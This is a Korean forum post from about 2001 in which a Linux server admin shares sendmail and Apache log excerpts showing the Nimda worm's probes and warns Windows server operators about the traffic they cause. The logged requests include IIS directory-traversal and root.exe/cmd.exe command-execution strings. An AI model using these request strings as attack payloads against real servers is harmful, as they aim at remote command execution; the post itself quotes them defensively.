>> Edit article
이름
제목
패스워드
죄송 제 개인적인 생각으로 도움이 될까해서요.. 어제 저녁 18일 22시 부터 센드메일에 이상한 로그가 자꾸 남아서 분석을 했는데 .. 이런 메일로그가 남더군요 .. Sep 18 22:17:46 localhost sendmail[11804]: f8IDHk511804: collect: premature EOM: Error 0 Sep 18 22:17:46 localhost sendmail[11804]: f8IDHk511804: collect: unexpected close on connection from [211.197.111.111], sender=<aaaa200@hanmail.net>: Error 0 그래서 여러 사이트를 검색하다가 센드메일 faq문서에 이런 내용이 있데요. If you are just getting occasional such messages, they're probably due to a temporary network problem, or the remote host crashing or otherwise abruptly terminating the connection. 근데 내 눈에 뛰는게 crashing 단어 그 것을 보는 순간 nimda 바이러스가 뇌리를 스치더군요. 그래서 자료를 뒤져보니 "이 바이러스에 대한 대처는 바이러스가 너무 신속하게 공격해 어려움을 겪고 있다. 줄로토는 세계 표준시간으로 13시 (한국시간 18일 밤 10시) 에 노르웨이의 한 웹사이트에서 이 바이러스가 처음 발견됐다고 말했다." 으 밤 10시 그래서 아파치 로그를 확인해보니 211.42.47.73 - - [18/Sep/2001:22:07:19 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 211.42.47.73 - - [18/Sep/2001:22:07:19 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278 211.42.47.73 - - [18/Sep/2001:22:07:19 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 211.42.47.73 - - [18/Sep/2001:22:07:20 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 211.42.47.73 - - [18/Sep/2001:22:07:20 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 211.42.47.73 - - [18/Sep/2001:22:07:20 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/ cmd.exe?/c+dir HTTP/1.0" 404 319 211.42.47.73 - - [18/Sep/2001:22:07:20 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/ cmd.exe?/c+dir HTTP/1.0" 404 319 211.42.47.73 - - [18/Sep/2001:22:07:20 +0900] "GET /msadc/ ..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../ winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 이런 로그가 도배를 했더군요 , 로그가 쌓이는 속도가 장난이 아니데요 서비스를 하지않는 아파치로그가 -rw-r--r-- 1 root root 6.1M Sep 19 15:21 access_log -rw-r--r-- 1 root root 3.8M Sep 19 15:21 error_log 위에 로그 용량은 순전히 nimda바이러스가 남기고 간 로그파일만 있는데 하루만에 6.1메가 라니 우리나라 서버을 다 함치면 엄청난 트래픽이 발생하고 있는것 같네요. 리눅스 서버에는 직접적인 영향은 없지만 네트웍 트래픽이 증가 하면서 메일 서버에 영향을 미치는 것 같네요. 그리구 웹서버에도 액세스가 늘어나 속도 저하가 생길 것이구요 코드레드 보다 더 강력한 트래픽을 발생시키고 있는 것 같네요 nimda 바이러스는 최초로 발견된 것은 외국이지만 거의 동시에 우리 나라도 융단 폭격을 당하고 있는 것 같네요. 윈도우 서버 돌리시는 분들 조심하세요
Copyleft
1999-2026 by
JSBoard Open Project
Theme Designed by
IDOO
All right reserved